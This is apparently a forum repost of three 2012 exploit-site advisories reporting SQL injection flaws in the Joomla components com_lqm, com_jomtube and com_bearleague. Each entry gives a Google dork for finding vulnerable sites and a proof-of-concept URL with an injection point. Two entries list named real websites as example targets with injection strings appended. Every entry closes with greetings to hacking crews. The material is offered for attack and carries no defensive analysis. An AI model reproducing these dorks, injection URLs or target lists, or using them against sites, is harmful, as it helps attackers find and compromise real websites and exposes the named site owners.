توییت
joomla component (com_lqm) SQL injection Vulnerability
################################################## # Exploit Title:
joomla
component (com_lqm) SQL injection Vulnerability #Developer: Not Registered # Date: 10/04/2012 # Author: xDarkSton3x # E-mail : [email protected] # Category: webapps # Google dork: inurl:"index.php?option=com_lqm" # Example Sites : http://www.chasehost.net/rcc/index.php?option=com_lqm&query=68&name=jsession_te st&Itemid=%27 http://www.embaperu.ch/index.php?option=com_lqm&8a60248c75245fcd51919a0ce d0df5b1=1&task=showResults&query=20&lqm_Year=%s&&I temid=%27 http://maprunner.org.uk/index.php?option=com_lqm&8a60248c75245fcd51919a0ce d0df5b1=1&task=showResults&query=20&lqm_Year=%s&&I temid=%27 http://www.madisoncountyky.us//index.php?option=com_lqm&query=68&name=jsession_te st&Itemid=' ################################################## [~]Exploit/p0c : http://site.com/index.php?option=com_lqm&query=68&name=jsession_te st&Itemid=[sqli] Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng] - [ Malandrines Team - DiosdelaRed.Com - RemoteExecution ] [ Dedalo - Maztor ] # 1337day.com [2012-04-10]
Joomla component (com_jomtube) SQL injection Vulnerability
################################################## # Exploit Title:
joomla
component (com_jomtube) SQL injection Vulnerability # Date: 10/04/2012 # Author: xDarkSton3x # E-mail : [email protected] # Category:: webapps # Google dork: inurl:"index.php?option=com_jomtube view=video id=" # Example Sites : http://www.reggaeton.com/index.php?option=com_jomtube&view=video&id=' http://www.acnethai.com/index.php?option=com_jomtube&view=video&id=' http://www.balonmanociudadencantada.com/index.php?option=com_jomtube&view=video&id=%27 http://www.bomberosguayaquil.gob.ec/index.php?option=com_jomtube&view=video&id=%27 http://urtoob.com/index.php?option=com_jomtube&view=video&id=%27 # Tested on: linux + windows ################################################## [~]Exploit/p0c : http://www.site.com/index.php?option=com_jomtube&view=video&id='[sql injection] Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng] - [ Malandrines Team - DiosdelaRed.Com - RemoteExecution ] [ Dedalo - Maztor ] # 1337day.com [2012-04-10]
Joomla component (com_bearleague) SQL injection Vulnerability
[align=CENTER]################################################## # Exploit Title:
joomla
component (com_bearleague) SQL injection Vulnerability # Date: 10/04/2012 # Author: xDarkSton3x # E-mail : [email protected] # Category:: webapps # Google dork: inurl:com_bearleague # Vendor: http://beardev.com/component/joobb/topic/220-BearLeagueforSnookerorindividualSports.html # Tested on: linux + windows ################################################## [~]Exploit/p0c : http://site.com/index.php?option=com_bearleague&task=team&tid=8&si d=1&Itemid=%27 Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng] - [ Malandrines Team - DiosdelaRed.Com - RemoteExecution ] [ Dedalo - Maztor ] # 1337day.com [2012-04-10][/align]